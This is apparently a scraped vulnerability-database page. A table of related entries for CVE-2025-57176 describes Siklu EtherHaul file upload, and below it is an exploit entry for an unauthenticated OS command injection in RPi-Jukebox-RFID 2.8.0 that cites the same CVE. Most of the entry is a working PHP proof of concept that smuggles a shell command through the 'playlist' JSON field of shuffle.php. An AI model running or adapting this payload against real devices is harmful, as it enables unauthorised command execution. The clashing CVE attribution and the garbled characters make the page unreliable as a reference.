| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
| Exploit for CVE-2025-57176 | 24 Sep 202522:16 | โ | githubexploit | |
| CVE-2025-57176 | 24 Sep 202520:16 | โ | circl | |
| Ceragon EtherHaul series ไปฃ็ ้ฎ้ขๆผๆด | 15 Sep 202500:00 | โ | cnnvd | |
| CVE-2025-57176 | 15 Sep 202500:00 | โ | cve | |
| CVE-2025-57176 | 15 Sep 202500:00 | โ | cvelist | |
| Siklu EtherHaul Series EH-8010 - Arbitrary File Upload | 17 Jan 202600:00 | โ | exploitdb | |
| EUVD-2025-29215 | 3 Oct 202520:07 | โ | euvd | |
| Ceragon Siklu MultiHaul and EtherHaul Series | 10 Mar 202605:00 | โ | ics | |
| CVE-2025-57176 | 15 Sep 202517:15 | โ | nvd | |
| ๐ Siklu EtherHaul Series EH-8010 / EH-1200 Arbitrary File Upload | 20 Jan 202600:00 | โ | packetstorm |
=============================================================================================================================================
| # Title : RPi-Jukebox-RFID 2.8.0 OS Command Injection |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://github.com/MiczFlor/RPi-Jukebox-RFID |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/214067/ & CVE-2025-57176
[+] Summary : RPi-Jukebox-RFID version 2.8.0 suffers from an OS command injection vulnerability in the API endpoint:
/phoniebox/api/playlist/shuffle.php
The "playlist" JSON parameter is passed directly into a shell command without proper sanitization or escaping. This allows unauthenticated
remote attackers to execute arbitrary system commands.
[+] POC: A crafted PUT request with a malicious JSON payload allows execution of OS-level commands such as file creation.
php poc.php
<?php
$target = "http://YOUR-TARGET-IP/phoniebox/api/playlist/shuffle.php";
$injectedCommand = "test';touch indoushka.txt;echo '";
$data = json_encode([
"playlist" => $injectedCommand,
"shuffle" => "true"
]);
$headers = [
"Content-Type: application/json",
"User-Agent: Mozilla/5.0"
];
$ch = curl_init($target);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "PUT");
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
echo "[+] Sending malicious JSON payload...\n";
$response = curl_exec($ch);
if ($response === false) {
echo "[-] cURL Error: " . curl_error($ch) . "\n";
} else {
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
echo "[+] HTTP Status Code: {$httpCode}\n";
echo "[*] If vulnerable, file 'indoushka.txt' will be created on the server.\n";
}
curl_close($ch);
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation